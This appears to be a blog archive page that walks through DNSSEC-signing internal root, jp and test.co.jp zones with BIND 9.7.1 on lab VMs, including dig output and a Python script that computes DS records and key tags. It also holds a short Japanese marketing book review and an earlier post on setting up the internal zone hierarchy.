Preparing DNSSEC test zones ( below )
The following environment is used.
http://lost-and-found-narihiro.blogspot.com/2010/06/dns-how-to-deploy-internal-root-zone-jp.html
# named -v
BIND 9.7.1
internal root : hat1-vm 192.168.1.50
internal jp : hat2-vm 192.168.1.51
internal test.co.jp : hat3-vm 192.168.1.52
caching name server : hat4-vm 192.168.1.80
First, before building the island of trust ( a chain of trust anchored at the internal root's KSK instead of the real root ), make each zone DNSSEC-signed on its own.
[ internal root : hat1-vm ]
[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.
x.root-servers.net. IN A 192.168.1.50
jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
- generate KSK
[root@hat1-vm named]# pwd
/var/named <- the directory containing the zone files
[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom .
Generating key pair..++++++ ...........................................................................++++++
K.+008+24796
( from the dnssec-keygen man page )
-3 Use an NSEC3-capable algorithm to generate a DNSSEC key. If this
option is used and no algorithm is explicitly set on the command
line, NSEC3RSASHA1 will be used by default. Note that RSASHA256 and
RSASHA512 algorithms are NSEC3-capable.
-a algorithm : RSASHA256 here, DNSSEC algorithm number 8, which is the "008" in the K.+008+24796 file name.
- generate ZSK
[root@hat1-vm named]# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom .
Generating key pair................................+++ ................................+++
K.+008+18525
- modify zone file
Add the KSK and ZSK public keys to the zone file ( concatenate the .key files and $INCLUDE them )
[root@hat1-vm named]# cat K.+008+*.key > root.key
[root@hat1-vm named]# cat root_zone_internal.db
$TTL 86400
@ IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.
x.root-servers.net. IN A 192.168.1.50
jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
$INCLUDE "root.key";
- sign the zone
[root@hat1-vm named]# dnssec-signzone -o . root_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
ZSKs: 1 active, 0 stand-by, 0 revoked
root_zone_internal.db.signed
Without -s/-e, dnssec-signzone uses a signature validity window of 30 days ( inception one hour before signing ), which is exactly what the RRSIG timestamps below show ( 20100629144058 to 20100729144058 ). The zone has to be re-signed before that expiration; a validating resolver answers SERVFAIL once the signatures have expired.
- modify named.conf
options {
directory "/var/named";
pid-file "/var/run/named/named.pid";
max-cache-size 20M;
recursion no;
version "";
dnssec-enable yes; <- this
dnssec-validation yes; <- this ( validation only happens on a recursive server; with recursion no it is harmless but does nothing )
};
zone "." in {
type master;
# file "root_zone_internal.db";
file "root_zone_internal.db.signed"; <- this ( load the signed file; on every change, bump the serial in the unsigned file and run dnssec-signzone again )
};
- start BIND
[root@hat1-vm named]# named
syslog
Jun 30 00:43:23 hat1-vm named[2243]: zone ./IN: loaded serial 2010062304 (DNSSEC signed)
Check. Looks fine.
[root@hat1-vm named]# dig @127.1 . soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40509
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA
;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. 2010062304 3600 900 2592000 3600
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 20100629144058 18525 . v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZEZkpBSRpKqRoE sJS8DwtylTswMUStdNoQQksh7Am0T+s/C/NzAdw5Q7P4EgEZl0994KJD ecuDWacw8sh4ZA2WTS45X3vpiQdLrhRHuVp0oow5zazUCvs7d3d0PkIn LRGTDSXPvTwrWAVAwfqZc7sOitXxV0w4ZQpoQLNbMDO4c1QFNGbtoWOf lBjX2PBuAcA3vSDQ5045INszrOCBkPcgO5n9yAUddagSDxS41+4827K8 qAy4SaAwuCEkeXCMeRUXl6suh9KFmLtsH4sEnjrHkN8W/trmaRZNKG9O 1NEFhg==
[root@hat1-vm named]# dig @127.1 jp soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 2949
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:53 2010
;; MSG SIZE rcvd: 394
[root@hat1-vm named]#
[root@hat1-vm named]# dig @127.1 co.jp soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 3, ADDITIONAL: 2
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 3600 IN NSEC x.root-servers.net. NS RRSIG NSEC
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729144058 20100629144058 18525 . d1+KRH3zHRUbHjWa89PteodxieWybwJ1JHu8FVTVuQrS2q47qyZPyhzu BmA8XR9HW2B3a7ZML8IxMNB2pjPgnDguwoO+Kr0W0A72RueLkGFbw0Xd A2j2qcMdEvit7O2DMMe1Kx8ILclxZ+xtZrv4AyPU4Pt72u6Kqko3rvTX wQMsxzv5D7A7bLLJ5V6CgOT7fmRZFHwpKbEX2akScSEK77XXbOp+Paop dVlmmGwVpTeidtHQQy9AB7N27/AXiWBWmy63+1kUsclQOlIbs4i5NtO1 VeDjSW3TDW81ZO6kRkXWi6kQq0kDfeScH9ztswx74JNn5dQpmeMf+IKQ YKP4XQ==
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
;; Query time: 2 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 00:45:59 2010
;; MSG SIZE rcvd: 397
[root@hat1-vm named]#
Note the NSEC record returned for jp.: its type bitmap is "NS RRSIG NSEC" with no DS, which is the root's signed proof that no DS exists for jp. A validator therefore treats jp. as an insecure ( unsigned ) delegation rather than as bogus, until a DS for jp. is added to the root zone and the root is re-signed.
Check from the caching server.
Register the internal root's KSK ( K.+008+24796 ) in trusted-keys
options {
directory "/var/named";
pid-file "/var/run/named/named.pid";
max-cache-size 5M;
recursion yes;
version "";
dnssec-enable yes;
dnssec-validation yes;
( ... )
zone "." in {
type hint;
file "named.ca";
};
( ... )
trusted-keys {
"." 257 3 8 "AwEAAbMQ3cEdLfYbAitpiWvfJkWKncHe2PyNwd77jHCwy0eSm7EBtqqorZic53HgeolqwoAxut/m+BmGCTHU8pcbrphiGIxrSz1o4KjzCcchKmvzvClM78IrB9XZA8Z1twTMf/n2i1aMxSbIrmaP9Ik4eu7xr2RwNu2y6LaJfFGSF/7Z";
};
The hints file points at the internal root.
[root@hat4-vm hattori]# cat /var/named/named.ca
. 3600000 IN NS X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50
Now dig. The ad bit is set, so it looks fine.
[root@hat4-vm ~]# dig @127.1 . soa +dnssec +multiline
; <<>> DiG 9.7.1 <<>> @127.1 . soa +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 15386
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN SOA
;; ANSWER SECTION:
. 86400 IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304 ; serial
3600 ; refresh (1 hour)
900 ; retry (15 minutes)
2592000 ; expire (4 weeks 2 days)
3600 ; minimum (1 hour)
)
. 86400 IN RRSIG SOA 8 0 86400 20100729144058 (
20100629144058 18525 .
v7wamV28v9gv36qAFy+FO6O90/aAU7gVmouFIqZobmZE
ZkpBSRpKqRoEsJS8DwtylTswMUStdNoQQksh7Am0T+s/
[root@hat4-vm ~]# dig @127.1 . ns +dnssec +multiline
; <<>> DiG 9.7.1 <<>> @127.1 . ns +dnssec +multiline
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45504
;; flags: qr rd ra ad; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;. IN NS
;; ANSWER SECTION:
. 86250 IN NS x.root-servers.net.
. 86250 IN RRSIG NS 8 0 86400 20100729144058 (
20100629144058 18525 .
tME2znW74GdLmDOuspJCcrWrAEu45nfEV9iP+k5HidCG
R19q12e3CMjvsWrKJB4M4238rhNipJc9YA+rWMw7bwwD
BgzwTJDI1HAt30eMiEJnAnBqDYoievjDDpSl32TkyuUQ
[ internal jp zone : hat2-vm ]
zone "jp" in {
type master;
file "jp_zone_internal.db";
};
[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
- generate KSK
[root@hat2-vm named]# pwd
/var/named
# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom jp
- generate ZSK
# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom jp
- modify jp zone file
[root@hat2-vm named]# cat Kjp.+008+*.key > jp.key
[root@hat2-vm named]# cat jp_zone_internal.db
$TTL 86400
@ IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
test.co.jp. IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
$INCLUDE "jp.key";
- sign jp zone
[root@hat2-vm named]# dnssec-signzone -o jp jp_zone_internal.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
ZSKs: 1 active, 0 stand-by, 0 revoked
jp_zone_internal.db.signed
[root@hat2-vm named]# named
Jun 30 01:25:19 hat2-vm named[2326]: zone jp/IN: loaded serial 2010062303 (DNSSEC signed)
[root@hat2-vm named]# dig @127.1 jp soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 17885
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;jp. IN SOA
;; ANSWER SECTION:
jp. 86400 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 86400 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==
;; AUTHORITY SECTION:
jp. 86400 IN NS x.dns.jp.
jp. 86400 IN RRSIG NS 8 1 86400 20100729152408 20100629152408 20163 jp. o0KawU5TH51OJq9/uyApCjydNUMuEmLzFOL4yDzDaw+TfHzBfkebRgdQ OFosbykoRBOVYZIy+7x0/B8vYRPvHm5K9tRFFIoxbEmV7RdTsY1NJqvI CB2fjhMJFzO1MS9H87Ws4y/q6aXu4h0+jitILTPV7U2W66YxRqQCHp25 xg6vCz/JI6snXlqAehswnNIRx3yHsIxxdBxReJRxhzJvjdIpLfPRPPcv ILw84+C5xzQCmKTw8CyK4ceS0kVWmriVSjgyKH2fTMJZ6LSNgguvc88q Bf5sGuoEPpJ/9BXV2o7Hj9BdpPXhinvbHc/Wttu6+UUIFfC36Ql9FpqV SOfXPA==
;; ADDITIONAL SECTION:
x.dns.jp. 86400 IN A 192.168.1.51
x.dns.jp. 86400 IN RRSIG A 8 3 86400 20100729152408 20100629152408 20163 jp. ZRtCXGXRiog8qvAn8OWjt+Ougu5GX7cHeE7TFHGTjGzGc3hVe4uCTFd8 OFKwFdb1Jp0DGZPXw2drjPGKFT/Al/uGHV53f3aacFxXIbd/AL0OGEat nMwYZS6D2a6VMezxZy3TTSc6XO9ZD+7niTtmMdvLAVtjHoO9Q9T6k7AW DVyDMazMF0woaYy8eRxjlCI5eMdp1Wdg+kfoKgAF/Nuv01yx7Ii8p3L7 wwv/odrC9F/lKSvNc17YoGzSsCAtd0TR0gpLNbZwdXXBFLq90hgoICpL kIcQdn2nB9Xu3jzO+N9Dy7TzvGunpMC1jt4nTCe0W5Wcl02laPWdejU4 uFik4g==
;; Query time: 3 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Wed Jun 30 01:25:57 2010
;; MSG SIZE rcvd: 984
[root@hat2-vm named]#
[root@hat2-vm named]# dig @127.1 co.jp soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 32409
;; flags: qr aa rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;co.jp. IN SOA
;; AUTHORITY SECTION:
jp. 3600 IN SOA x.dns.jp. hostmaster.dns.jp. 2010062303 3600 900 2592000 3600
jp. 3600 IN RRSIG SOA 8 1 86400 20100729152408 20100629152408 20163 jp. WNS9s/JLh+QZcj73AkntNcu3fR7UfXgOZGq3aU7S55AjPOA5kCX71hMa OnRv2oFnojozxtTC6nOEWVXBifJ7pmbAApMg4W8RCwQAi2lVO43M+liF U1iJ4FuWT7BNVG63O4oUlQxhBWkgmV2h3eIL3m2b1LsGhWb09d9CH7hj Se6AmpmSRR69A8lAmUG/3godGnkqyPUPIZ6izLo9Q9PjCo4FLpiM7taT I+imqPkj54UEAEgNqP0pgNAnWjToZtpLhD2tsxuwW9yqyHaAv8/fgo9o 8xNNqz3m5bdxlc4KPdhBxDPl1hw6Xbxx0YOw+4Wp+A4RrbAaRpefYjzi RxHD1w==
jp. 3600 IN NSEC test.co.jp. NS SOA RRSIG NSEC DNSKEY
jp. 3600 IN RRSIG NSEC 8 1 3600 20100729152408 20100629152408 20163 jp. JIQHWC+6W7+geaCUTKC1+DCSZqMKwikcoPZcXCYhOixqNpB9sT6p3R8A fdKf19mMXDyUIUbqN6zDNA1OP7x5gwJ4eFr8Kv+QA5Cafp3NaKkrcoGf iZA0lN+A1nIOVxvtbP9tj8pyOI0Vb+nMuQhbvac9IOVE8hxHzihh+04D tQRSJ/lHlgNyQK1THbwaQDfstw4DzxWyeCOrBHj7Q/4ofpL5XwvjnwfI cMfrj4CBHIHID/64pq6CulfvJwjaCFBU4Jalx99FwxeZ0DD+UY7zVGS5 F/nus3QkDqhO382YFiJp6UHsb/T5uOREq9v0kWe/UDEYg7NZLD0P7KHU 8q4+bw==
There is no chain of trust yet ( the root zone has no DS record for jp ), so the caching-server side is still to be configured.
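The missing piece for the chain of trust is a DS record in each parent: the root has to publish a DS for the jp KSK and jp a DS for the test.co.jp KSK, and each parent then has to be re-signed. The script below is an added example written for this page, not part of the original post and not BIND code: it computes the RFC 4034 key tag and the SHA-256 DS record ( RFC 4509 ) from a DNSKEY, and cross-checks the root KSK pasted into trusted-keys above against the key tag in its file name ( K.+008+24796 ). TOY_PUBKEY is a constructed key whose tag can be checked by hand; ROOT_KSK_B64 is the key string from the trusted-keys block on this page with its line wrapping removed. BIND's own dnssec-dsfromkey -2 Kjp.+008+NNNNN.key produces the same DS.

```python
import base64
import hashlib
import struct


def name_to_wire(name: str) -> bytes:
    """Canonical wire form of an owner name (RFC 4034 s6.2): lowercase, length-prefixed labels."""
    labels = [lbl for lbl in name.lower().rstrip(".").split(".") if lbl]
    return b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in labels) + b"\x00"


def dnskey_rdata(flags: int, protocol: int, algorithm: int, pubkey: bytes) -> bytes:
    """DNSKEY RDATA: 2-byte flags, 1-byte protocol (always 3), 1-byte algorithm, public key."""
    return struct.pack("!HBB", flags, protocol, algorithm) + pubkey


def key_tag(rdata: bytes) -> int:
    """Key tag from RFC 4034 Appendix B (valid for every algorithm except RSA/MD5)."""
    ac = 0
    for i, b in enumerate(rdata):
        ac += b if i & 1 else b << 8
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


DIGESTS = {1: hashlib.sha1, 2: hashlib.sha256}  # DS digest types (RFC 4034, RFC 4509)


def ds_record(owner: str, flags: int, protocol: int, algorithm: int,
              pubkey: bytes, digest_type: int = 2) -> str:
    """The DS RR the parent must publish: digest over owner-name wire form + DNSKEY RDATA."""
    rdata = dnskey_rdata(flags, protocol, algorithm, pubkey)
    digest = DIGESTS[digest_type](name_to_wire(owner) + rdata).hexdigest().upper()
    return f"{owner} IN DS {key_tag(rdata)} {algorithm} {digest_type} {digest}"


def ds_from_base64(owner: str, flags: int, protocol: int, algorithm: int,
                   pubkey_b64: str, digest_type: int = 2) -> str:
    """Same, taking the key as it appears in a K*.key file or a trusted-keys block."""
    return ds_record(owner, flags, protocol, algorithm, base64.b64decode(pubkey_b64), digest_type)


# Constructed toy key (not a real RSA key) whose key tag can be checked by hand: 45784.
TOY_PUBKEY = b"\x03\x01\x00\x01\xab\xcd"

# The internal-root KSK from the trusted-keys block on this page (flags 257 = KSK,
# protocol 3, algorithm 8 = RSASHA256), with the line-wrap artifacts removed.
ROOT_KSK_B64 = (
    "AwEAAbMQ3cEdLfYbAitpiWvfJkWKncHe2PyNwd77jHCwy0eSm7EBtqqorZic53Hgeo"
    "lqwoAxut/m+BmGCTHU8pcbrphiGIxrSz1o4KjzCcchKmvzvClM78IrB9XZA8Z1twTMf"
    "/n2i1aMxSbIrmaP9Ik4eu7xr2RwNu2y6LaJfFGSF/7Z"
)


def root_ksk_tag_matches(expected: int = 24796) -> bool:
    """Sanity check for a pasted trust anchor: its tag must equal the one in the
    key file name (K.+008+24796); any copy/paste damage changes the tag."""
    rdata = dnskey_rdata(257, 3, 8, base64.b64decode(ROOT_KSK_B64))
    return key_tag(rdata) == expected


if __name__ == "__main__":
    print(ds_record("jp.", 257, 3, 8, TOY_PUBKEY))
    print(ds_from_base64(".", 257, 3, 8, ROOT_KSK_B64))
    print("pasted root KSK matches tag 24796:", root_ksk_tag_matches())
```

The DS line printed for a real KSK goes into the parent's unsigned zone file at the child's delegation point ( next to the NS records ), followed by a serial bump and dnssec-signzone on the parent; only then does the validator on hat4-vm see jp ( and below it test.co.jp ) as secure rather than insecure.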
[ test.co.jp : hat3-vm ]
[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@ IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
2010062303
1h
15m
30d
1h )
IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1
- generate KSK and ZSK
# dnssec-keygen -a RSASHA256 -3 -b 1024 -f ksk -r /dev/urandom test.co.jp
# dnssec-keygen -a RSASHA256 -3 -b 2048 -r /dev/urandom test.co.jp
[root@hat3-vm named]# cat Ktest.co.jp.+008+*.key > test.co.jp.key
[root@hat3-vm named]# cat test.co.jp.db
$TTL 86400
@ IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
2010062303
1h
15m
30d
1h )
IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1
$INCLUDE "test.co.jp.key";
[root@hat3-vm named]# dnssec-signzone -o test.co.jp test.co.jp.db
Verifying the zone using the following algorithms: RSASHA256.
Zone signing complete:
Algorithm: RSASHA256: KSKs: 1 active, 0 stand-by, 0 revoked
ZSKs: 1 active, 0 stand-by, 0 revoked
test.co.jp.db.signed
zone "test.co.jp" {
type master;
# file "test.co.jp.db";
file "test.co.jp.db.signed";
};
Jun 30 01:37:35 hat3-vm named[2764]: zone test.co.jp/IN: loaded serial 2010062303 (DNSSEC signed)
[root@hat3-vm named]# dig @127.1 test.co.jp soa +dnssec
; <<>> DiG 9.7.1 <<>> @127.1 test.co.jp soa +dnssec
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 48852
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 3
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags: do; udp: 4096
;; QUESTION SECTION:
;test.co.jp. IN SOA
;; ANSWER SECTION:
test.co.jp. 86400 IN SOA ns.test.co.jp. hostmaster.test.co.jp. 2010062303 3600 900 2592000 3600
test.co.jp. 86400 IN RRSIG SOA 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. TMtWJBFkKfWnBYyu/I1YddPXisB0HHN3YMJGtFvyPzqRzCpByoXGm5dp Hp30+XosNWdAQaNharVcdILUHJPdBAePzhT8HLiNQfTFVTyrLNikRVvp gmDtey8ueI5Kx+78oTwHHWAzcjUgT+9r9R0w4hP8ggjd0VR4KZb1k0rR wpkAuTKcFroJfQTS/7Kk6tYhvJ5DOfkutcQYK5ymhmiQoRKQl0zgDb// 5Lg8DwimbVofIhwDgSJYxKE2qSxN+pu1RFzPWB5snAJ5IOQMDwnAeU3h k0svEta6uzfI8cRPAgKATx47JmGcMCbQ25J2HhrlW52Dc4SaYIKVuO+/ wwCnlA==
;; AUTHORITY SECTION:
test.co.jp. 86400 IN NS ns.test.co.jp.
test.co.jp. 86400 IN RRSIG NS 8 3 86400 20100729153623 20100629153623 8448 test.co.jp. wAVapgwcoYN/BRZODCUC/JeFp/Nfg2r4cVP5vZGQZzalQRmSomVO6Iwv VLlZkajq2XLbS1v5LHIeu/wAWBaA0ms2MQ4eXSUZNmVIMXj3pyYgVTA2 WSENhzKZ2MsNoOJn3D2ypXxrRLB8SF2zLKHI9N4yRNtT6MDUD8PNT46c f2mEQMfotZdmd5tS2A/J13+nB2gCFN8MBxPWvJLnKoDYZUfc3y3the4b 3KpyJMswO4kvy4VqR9rHVYntIr4D5QFcIqxt+GtBjgAgx/W3C8TE+2ca akdiwhnwNuBKCSnAfH+njuc9+J0ReHa+CJO+XIhVCHRF8QBNImxR7odc uRD7VA==
;; ADDITIONAL SECTION:
ns.test.co.jp. 86400 IN A 192.168.1.52
ns.test.co.jp. 86400 IN RRSIG A 8 4 86400 20100729153623 20100629153623 8448 test.co.jp. bZgXs0iHMhS8VCbKSYMtYSvbM1qWd2bym4HeMsM2BihmYaFkm9M1BmTy pQEv9Jpb3MuZmW7iA6GWyX2u0xepbRI3CKmZMlzGX6MhuK8a1GgprH+R 2nlx0sLlkP6VT0dmOh1F1ANu6M4RE1zo2lHR++X9vacpqZzpJPhAegNr Aq09u35RnUcUSLo7miQGuO11/CESK76w1GXLXEDjxzkaqEIxIwVCwA9t E4mx7WG3U9zOqMlRgo9vJ5o06EcANhVDASGNCrw9I6AUPr9AYFn/lH/s wIE0eDZPqDkklxATNBCaGqOKL5j5eXEY4sjFSzHn82A0j/2JQkK2EZ/s EqeCrw==
That's it for now.
Cheers!
Book review: マーケティング実践講座
マーケティング実践講座
Author: 須藤和和
ダイヤモンド社 ( Diamond, Inc. )
As the title says, a book on marketing strategy.
What I liked about this book is its structure: it first explains the steps involved in doing marketing, and then
uses a real case to walk through the strategy from product development to sales, which makes it very easy to follow.
It explains how to think about segmentation, selecting target customers, product development, pricing, promotion and the choice of distribution channels.
As analysis methods it covers SWOT analysis, 3C, 4P and regression analysis, which is very useful.
The discussion of what makes a good ( or bad ) questionnaire for surveying customer needs was particularly interesting.
There are examples of mistakes one tends to make, and I found myself nodding along
in many places.
As the case study, it explains carefully what marketing strategy was built for Suntory DAKARA, from product development through to sales, which helped deepen my understanding.
Specifically, it analyzes in detail what strategy was presumably taken given the competing products already on the market ( Pocari Sweat, Aquarius ), and there was a lot to learn from it.
How to build a sales strategy when competing products already exist is something I always struggle with,
so this is a book whose lessons I felt could be applied in many ways.
DNS: how to deploy internal root zone , jp zone , test.co.jp zone for internal testing
Is this configuration right?? I might have made a mistake somewhere.
internal root : 192.168.1.50 ( hostname : hat1-vm )
internal jp ( co.jp ) : 192.168.1.51 ( hostname : hat2-vm )
test.co.jp : 192.168.1.52 ( hostname : hat3-vm )
caching server : 192.168.1.80 ( hostname : hat4-vm )
All DNS servers are running under KVM ( Kernel-based Virtual Machine).
# named -v
BIND 9.7.1
[ internal root server ( hat1-vm ) ]
zone "." in {
type master;
file "root_zone_internal.db";
};
[root@hat1-vm ~]# cat /var/named/root_zone_internal.db
$TTL 86400
. IN SOA x.root-servers.net. hostmaster.root-servers.net. (
2010062304
1h
15m
30d
1h )
IN NS x.root-servers.net.
x.root-servers.net. IN A 192.168.1.50
jp. IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
co.jp. IN NS x.dns.jp.
( The co.jp. NS line sits below the jp. delegation cut, so it is occluded: named never serves it, and a query for co.jp at this server returns the jp. referral, as the dig output further down shows. It can simply be dropped; the version of this file in the DNSSEC post above no longer has it. )
[ internal jp (co.jp ) zone ( hat2-vm ) ]
zone "." in {
type hint;
file "named.ca";
};
zone "jp" in {
type master;
file "jp_zone_internal.db";
};
The root hint points at the internal root server's IP, 192.168.1.50
[root@hat2-vm ~]# cat /var/named/named.ca
. 3600000 IN NS X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50
[root@hat2-vm ~]#
- jp zone
[root@hat2-vm ~]# cat /var/named/jp_zone_internal.db
$TTL 86400
jp. IN SOA x.dns.jp. hostmaster.dns.jp. (
2010062303
1h
15m
30d
1h )
IN NS x.dns.jp.
x.dns.jp. IN A 192.168.1.51
test.co.jp. NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
[root@hat2-vm ~]#
[ test.co.jp zone ( hat3-vm ) ]
zone "." in {
type hint;
file "named.ca";
};
zone "test.co.jp" {
type master;
file "test.co.jp.db";
};
[root@hat3-vm ~]# cat /var/named/named.ca
. 3600000 IN NS X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50
[root@hat3-vm ~]#
[root@hat3-vm ~]# cat /var/named/test.co.jp.db
$TTL 86400
test.co.jp. IN SOA ns.test.co.jp. hostmaster.test.co.jp. (
2010062303
1h
15m
30d
1h )
IN NS ns.test.co.jp.
ns.test.co.jp. IN A 192.168.1.52
www.test.co.jp. IN A 10.0.0.1
[ caching server ( hat4-vm ) ]
( recursion yes with no allow-recursion makes this an open resolver for every host that can reach it; fine on an isolated lab network, but add something like allow-recursion { localnets; }; before exposing it. )
options {
directory "/var/named";
pid-file "/var/run/named/named.pid";
max-cache-size 5M;
recursion yes;
version "";
};
zone "." in {
type hint;
file "named.ca";
};
[root@hat4-vm ~]# cat /var/named/named.ca
. 3600000 IN NS X.ROOT-SERVERS.NET.
X.ROOT-SERVERS.NET. 3600000 A 192.168.1.50
[ Check that www.test.co.jp resolves from the caching server ]
It resolved!
